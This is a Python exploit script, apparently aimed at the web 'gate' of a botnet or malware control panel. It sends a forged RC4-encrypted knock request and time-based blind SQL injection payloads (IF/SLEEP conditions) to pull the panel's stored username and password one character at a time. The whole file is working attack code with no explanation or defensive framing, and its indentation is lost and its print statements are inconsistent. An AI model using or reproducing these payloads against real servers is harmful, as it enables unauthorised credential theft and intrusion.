import requests
import time
import sys
wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number
KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification
PostData = ""
def rc4_crypt(data , key):
S = list(range(256))
j = 0
out = []
for i in range(256):
j = (j + S[i] + ord( key[i % len(key)] )) % 256
S[i] , S[j] = S[j] , S[i]
i = j = 0
for char in data:
i = ( i + 1 ) % 256
j = ( j + S[i] ) % 256
S[i] , S[j] = S[j] , S[i]
out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
return ''.join(out)
def brute_length(url, id):
for i in range(0, 30):
Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay)
ConnectUrl = url + '?i=' + Injection
start = time.time()
r = requests.post(ConnectUrl, data=PostData, headers='')
end = time.time()
if((end - start) >= wait_delay):
return i
return 0
def brute_char(url, position, id):
sys.stdout.write(" ")
sys.stdout.flush()
for i in range(32, 127):
Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay)
ConnectUrl = url + '?i=' + Injection
sys.stdout.write("\b%c" % chr(i))
sys.stdout.flush()
start = time.time()
r = requests.post(ConnectUrl, data=PostData, headers='')
end = time.time()
if((end - start) >= wait_delay):
break
def brute_panel(url):
global KnockString, PostData
PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa')
print"Username: ",;
sys.stdout.flush()
ulen = brute_length(url, 1)
for i in range(1, ulen+1):
brute_char(url, i, 1)
print"\nPassword: ",
sys.stdout.flush()
plen = brute_length(url, 2)
for i in range(1, plen+1):
brute_char(url, i, 2)
print""
if(len(sys.argv) >= 2):
brute_panel(sys.argv[1])
else:
print("enter panel gate url")